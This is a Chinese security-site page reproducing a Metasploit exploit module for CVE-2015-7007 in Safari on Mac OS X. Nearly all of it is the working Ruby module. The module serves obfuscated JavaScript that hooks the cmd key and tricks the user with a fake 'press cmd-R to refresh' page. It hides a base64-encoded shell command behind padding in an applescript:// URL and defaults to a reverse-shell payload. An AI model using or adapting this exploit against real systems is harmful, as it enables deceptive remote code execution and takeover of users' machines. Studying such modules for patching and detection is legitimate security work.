首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Safari User-Assisted Applescript Exec Attack 来源：metasploit.com 作者：joev 发布时间：2015-10-27   ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class Metasploit3 < Msf::Exploit::Remote   Rank = ManualRanking     include Msf::Exploit::EXE   include Msf::Exploit::Remote::BrowserExploitServer     def initialize(info = {})     super(update_info(info,       'Name'           => 'Safari User-Assisted Applescript Exec Attack',       'Description'    => %q{         In versions of Mac OS X before 10.11.1, the applescript:// URL         scheme is provided, which opens the provided script in the Applescript         Editor. Pressing cmd-R in the Editor executes the code without any         additional confirmation from the user. By getting the user to press         cmd-R in Safari, and by hooking the cmd-key keypress event, a user         can be tricked into running arbitrary Applescript code.           Gatekeeper should be disabled from Security & Privacy in order to         avoid the unidentified Developer prompt.       },       'License'         => MSF_LICENSE,       'Arch'            => ARCH_CMD,       'Platform'        => ['unix', 'osx'],       'Compat'          =>         {           'PayloadType' => 'cmd'         },       'Targets'         =>         [           [ 'Mac OS X', {} ]         ],       'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },       'DefaultTarget'   => 0,       'DisclosureDate'  => 'Oct 16 2015',       'Author'          => [ 'joev' ],       'References'     =>         [           [ 'CVE', '2015-7007' ],           [ 'URL', 'https://support.apple.com/en-us/HT205375' ]         ],       'BrowserRequirements' => {         :source  => 'script',         :ua_name => HttpClients::SAFARI,         :os_name => OperatingSystems::Match::MAC_OSX       }     ))       register_options([       OptString.new('CONTENT', [false, "Content to display in browser",         "This page has failed to load. Press cmd-R to refresh."]),       OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])     ], self.class)   end     def on_request_exploit(cli, request, profile)     print_status("Sending #{self.name}")     send_response_html(cli, exploit_html)   end     def exploit_html     "<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>"   end     def exploit_js     js_obfuscate %Q|       var as = Array(150).join("\\n") +         'do shell script "echo #{Rex::Text.encode_base64(sh)} \| base64 --decode \| /bin/sh"';       var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);       window.onkeydown = function(e) {         if (e.keyCode == 91) {           window.location = url;         }       };     |   end     def sh     'killall "Script Editor"; nohup ' + payload.encoded   end     def content     datastore['CONTENT']   end     end   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Windows 10 - pcap Driver Local ·Avant Browser Lite / Ultimate ·Easy File Sharing Web Server 7 ·HandyPassword 4.9.3 SEH Overwr ·The World Browser 3.0 Final - ·SiteWIX SQL Injection ·Alreader 2.5 .fb2 - SEH Based ·HTML Compiler Remote Code Exec ·Beckhoff CX9020 CPU Module - R ·Microsoft Compiled HTML Help R ·Zpanel Remote Unauthenticated ·Winamp Bento Browser Remote Co   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved